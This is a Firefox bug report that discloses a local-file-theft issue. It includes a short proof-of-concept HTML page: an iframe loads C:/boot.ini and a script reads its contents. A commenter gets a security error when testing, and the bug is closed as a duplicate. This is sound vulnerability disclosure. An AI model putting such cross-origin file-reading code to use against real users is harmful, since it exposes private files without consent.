Directory listing and file content stealing via iframes.

RESOLVED DUPLICATE of bug 230606

Status

()

Firefox
Security
--
major
RESOLVED DUPLICATE of bug 230606
12 years ago
12 years ago

People

(Reporter: T3st3r, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

(URL)

Attachments

(1 attachment)

(Reporter)

Description

12 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7

I'd detected iframe-based code which is capable to steal either directory listing or even given file content.This is unfair.

Example tested by me:
(based on http://www.gnucitizen.org/blog/web-pages-from-hell)

<html>
<body>
<iframe src="file:///C:/boot.ini" onload="getContent(this)"></iframe>
<script>
  function getContent(iframe) {
    var content = '';
    if (iframe.contentDocument) {
      content = iframe.contentDocument.body.innerHTML; 
    } else if (iframe.contentWindow) {
      content = iframe.contentWindow.document.body.innerHTML;
    } else if (iframe.document) {
      content = iframe.document.body.innerHTML;
    }
    alert(content);
  }
</script>
</body>
</html>


Reproducible: Always

Steps to Reproduce:
1. You should have C:\boot.ini file (definitely means NT-based OS here), you can use another file name though.
2. Write down given code to something.html
3. Open this page in browser
Result:
 Alert() messagebox appears with file content.
Actual Results:  
Directory listings and file data could be accessed by browser without user's consent.Browser can send private\confidential data without user's consent.

Expected Results:  
Such actions surely should be denied by browser security checks.Othervice browser can act as trojan horse\data thief.

All credits to http://www.gnucitizen.org/blog/web-pages-from-hell - I'm just rechecked if this works for my Firefox.It is :(

Comment 1

12 years ago
Created attachment 239957 [details]
testcase

I got a security error for 1.8.0.7, 1.8, 1.9 on winxp...

Comment 2

12 years ago

*** This bug has been marked as a duplicate of 230606 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 12 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.